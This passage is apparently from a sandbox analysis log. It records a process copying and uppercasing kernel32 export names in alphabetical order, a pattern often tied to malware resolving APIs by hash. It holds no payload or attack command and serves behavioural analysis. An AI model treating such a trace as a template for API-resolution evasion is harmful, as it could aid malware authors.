lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0180.512] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0180.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0180.512] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0180.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0180.512] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0180.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0180.512] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0180.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0180.512] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0180.512] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0180.513] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0180.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0180.513] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0180.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0180.513] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0180.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0180.513] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0180.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0180.513] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0180.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0180.513] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0180.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0180.513] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0180.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0180.513] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0180.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0180.513] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0180.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0180.513] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0180.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0180.513] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0180.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0180.513] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0180.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0180.513] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0180.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0180.513] lstrlenA (lpString="COPYCONTEXT") returned 11 [0180.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0180.513] lstrlenA (lpString="COPYFILEA") returned 9 [0180.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0180.513] lstrlenA (lpString="COPYFILEEXA") returned 11 [0180.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0180.513] lstrlenA (lpString="COPYFILEEXW") returned 11 [0180.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0180.513] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0180.513] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0180.513] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0180.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0180.514] lstrlenA (lpString="COPYFILEW") returned 9 [0180.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0180.514] lstrlenA (lpString="COPYLZFILE") returned 10 [0180.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0180.514] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0180.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0180.514] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0180.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0180.514] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0180.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0180.514] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0180.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0180.514] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0180.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0180.514] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0180.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0180.514] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0180.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0180.514] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0180.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0180.514] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0180.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0180.514] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0180.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0180.514] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0180.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0180.514] lstrlenA (lpString="CREATEEVENTA") returned 12 [0180.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0180.514] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0180.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0180.514] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0180.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0180.514] lstrlenA (lpString="CREATEEVENTW") returned 12 [0180.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0180.514] lstrlenA (lpString="CREATEFIBER") returned 11 [0180.514] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0180.514] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0180.515] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0180.515] lstrlenA (lpString="CREATEFILEA") returned 11 [0180.515] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0180.515] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0180.515] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0180.515] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0180.515] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0180.515] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0180.515] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0180.515] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0180.515] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0180.515] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0180.515] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0180.515] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0180.515] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0180.515] lstrlenA (lpString="CREATEFILEW") returned 11 [0180.515] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0180.515] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0180.515] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0180.515] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0180.515] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0180.515] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0180.515] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0180.515] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0180.515] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0180.515] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0180.515] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0180.515] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0180.515] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0180.515] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0180.515] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0180.515] lstrlenA (lpString="CREATEJOBSET") returned 12 [0180.515] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0180.515] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0180.515] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0180.515] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0180.515] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0180.515] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0180.516] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0180.516] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0180.516] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0180.516] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0180.516] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0180.516] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0180.516] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0180.516] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0180.516] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0180.516] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0180.516] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0180.516] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0180.516] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0180.516] lstrlenA (lpString="CREATEPIPE") returned 10 [0180.516] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0180.516] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0180.516] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0180.516] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0180.516] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0180.516] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0180.517] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0180.517] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0180.517] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0180.517] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0180.517] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0180.517] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0180.517] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0180.517] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0180.517] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0180.517] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0180.517] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0180.517] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0180.517] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0180.517] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0180.517] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0180.517] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0180.517] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0180.517] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0180.517] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0180.517] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0180.517] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0180.517] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0180.517] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0180.517] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0180.517] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0180.517] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0180.517] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0180.517] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0180.517] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0180.517] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0180.517] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0180.517] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0180.517] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0180.517] lstrlenA (lpString="CREATETHREAD") returned 12 [0180.517] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0180.517] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0180.517] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0180.517] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0180.518] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0180.518] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0180.518] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0180.518] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0180.518] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0180.518] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0180.518] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0180.518] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0180.518] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0180.518] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0180.518] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0180.518] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0180.518] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0180.518] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0180.518] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0180.518] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0180.518] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0180.518] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0180.518] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0180.518] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0180.518] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0180.518] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0180.518] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0180.518] lstrlenA (lpString="CTRLROUTINE") returned 11 [0180.518] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0180.518] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0180.518] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0180.518] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0180.518] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0180.518] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0180.518] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0180.518] lstrlenA (lpString="DEBUGBREAK") returned 10 [0180.518] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0180.518] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0180.518] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0180.518] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0180.518] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0180.519] lstrlenA (lpString="DECODEPOINTER") returned 13 [0180.519] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0180.519] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0180.519] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0180.519] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0180.519] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0180.519] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0180.519] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0180.519] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0180.519] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0180.519] lstrlenA (lpString="DELETEATOM") returned 10 [0180.519] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0180.519] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0180.519] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0180.519] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0180.519] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0180.519] lstrlenA (lpString="DELETEFIBER") returned 11 [0180.519] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0180.519] lstrlenA (lpString="DELETEFILEA") returned 11 [0180.519] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0180.519] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0180.519] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0180.519] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0180.519] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0180.519] lstrlenA (lpString="DELETEFILEW") returned 11 [0180.519] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0180.519] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0180.519] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0180.519] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0180.519] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0180.519] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0180.519] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0180.519] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0180.519] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0180.519] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0180.519] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0180.519] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0180.519] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0180.520] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0180.520] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") 